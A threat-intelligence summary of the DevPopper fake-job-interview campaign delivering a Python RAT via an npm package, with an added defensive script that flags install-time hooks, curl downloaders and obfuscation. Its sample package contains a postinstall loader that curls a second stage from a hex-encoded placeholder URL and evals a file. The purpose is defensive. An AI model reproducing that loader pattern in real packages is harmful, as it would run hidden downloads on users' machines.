DevPopper Campaign Targets Software Developers

2024-08-26 PolySwarm

https://blog.polyswarm.io/devpopper-campaign-targets-software-developers


PolySwarm summarizes DevPopper, a campaign in which threat actors pose as prospective employers and use fake job interviews with software developers as the pretext for delivering a Python-based remote access trojan (RAT). The infection chain begins when the candidate is asked to download and run GitHub-hosted code as an interview task. That code is an NPM package whose execution runs obfuscated JavaScript; the script uses Node.js and curl to retrieve a second-stage archive from the command-and-control (C2) server, and that stage carries the RAT. Once installed, DevPopper collects system, host, and network information and supports remote access, file search and exfiltration, command execution, clipboard logging, and keylogging. The post notes that Securonix assessed the campaign as likely North Korean, based on overlap with earlier activity, and that victims have been observed in South Korea, North America, Europe, and the Middle East. Updated variants extend targeting to Linux, Windows, and macOS and add FTP transfer, encrypted file upload, theft of browser credentials and cookies, stronger obfuscation, and directory traversal. Because the loader is ordinary Node.js code running under the developer's own account, any package a candidate is asked to execute for an interview should be treated as untrusted and inspected, or run only in an isolated environment, before it is installed on a working machine.
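The following is an added example, written for this summary and not taken from the PolySwarm post or the Securonix report. It is a small static triage check that a developer could run over an interview-task package before installing it, looking for the three loader traits the post describes: JavaScript wired to run automatically, use of Node.js child_process to invoke curl for a second stage, and obfuscation. The post does not say which mechanism runs the loader; the example assumes an install-time lifecycle script, which is the usual way an npm package executes code on install. The regexes, the entropy threshold, and the constructed sample package are assumptions chosen for illustration, not signatures for any real sample.

```javascript
// Added example: static pre-install triage of an npm package. Not code from
// the PolySwarm post or the Securonix report; all indicators, thresholds and
// the sample package below are assumptions made for illustration.
"use strict";

// npm runs these scripts automatically during install, with the user's privileges.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators (assumed for this example, not campaign signatures).
const INDICATORS = {
  childProcess: /require\(\s*['"]child_process['"]\s*\)|\bfrom\s+['"]child_process['"]/,
  curlCall: /\b(exec|execSync|spawn|spawnSync|execFile|execFileSync)\s*\([^)]*\bcurl\b/,
  evalUse: /\beval\s*\(|new\s+Function\s*\(/,
  hexEscapes: /(\\x[0-9a-fA-F]{2}){8,}/,
  base64Blob: /['"][A-Za-z0-9+/]{80,}={0,2}['"]/,
};
const OBFUSCATION_HITS = new Set(["evalUse", "hexEscapes", "base64Blob", "highEntropy"]);

// Shannon entropy in bits per character; packed or encoded payloads score
// higher than ordinary source. The 5.2 default threshold below is an assumption.
function shannonEntropy(text) {
  if (!text.length) return 0;
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / text.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// pkg: parsed package.json; files: map of path -> source text.
// Returns the lifecycle hooks found, per-file indicator hits, and a verdict.
function auditPackage(pkg, files, entropyThreshold = 5.2) {
  const hooks = {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) hooks[hook] = pkg.scripts[hook];
  }

  const findings = {};
  for (const [path, src] of Object.entries(files)) {
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
    const entropy = shannonEntropy(src);
    if (entropy > entropyThreshold) hits.push("highEntropy");
    if (hits.length) findings[path] = { hits, entropy: Number(entropy.toFixed(2)) };
  }

  const all = Object.values(findings);
  const downloader = all.some(
    (f) => f.hits.includes("childProcess") && f.hits.includes("curlCall"));
  const obfuscated = all.some((f) => f.hits.some((h) => OBFUSCATION_HITS.has(h)));

  let verdict = "clean";
  if (downloader && Object.keys(hooks).length) verdict = "suspicious-loader";
  else if (downloader || obfuscated) verdict = "review";
  return { hooks, findings, verdict };
}

// Constructed sample package (made up for this example). The hex-escaped
// string decodes to a placeholder URL under the reserved .invalid TLD.
const SAMPLE_PKG = {
  name: "interview-task",
  version: "1.0.0",
  scripts: { postinstall: "node lib/setup.js" },
};
const SAMPLE_FILES = {
  "lib/setup.js": [
    "const { execSync } = require('child_process');",
    "const u = '\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65"
      + "\\x2e\\x69\\x6e\\x76\\x61\\x6c\\x69\\x64\\x2f\\x73\\x32\\x2e\\x74\\x67\\x7a';",
    "execSync('curl -s -o /tmp/s2.tgz ' + u);",
    "eval(require('fs').readFileSync('/tmp/s2.js', 'utf8'));",
  ].join("\n"),
  "lib/util.js": "module.exports = (a, b) => a + b;\n",
};

function runSample() {
  return auditPackage(SAMPLE_PKG, SAMPLE_FILES);
}

console.log(JSON.stringify(runSample(), null, 2));
```

On the constructed sample the verdict is "suspicious-loader": the postinstall hook is present and lib/setup.js trips the childProcess, curlCall, evalUse and hexEscapes indicators, while lib/util.js produces no findings. A real package would be fed in by reading package.json and walking the tarball contents; the point of the check is to surface install-time execution and a curl-based downloader before npm ever runs the hook.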

Indicators of Compromise

Type   Value                               First Seen   Last Seen
HASH   63238b8d083553a8341bf6599d3d601…    2024-07-31   2024-08-26
HASH   bc4a082e2b999d18ef2d7de1948b2bf…    2024-07-31   2024-08-26
HASH   2d10b48454537a8977affde99f6edcb…    2024-07-31   2024-08-26
HASH   33617f0ac01a0f7fa5f64bd8edef737…    2024-04-25   2024-08-26
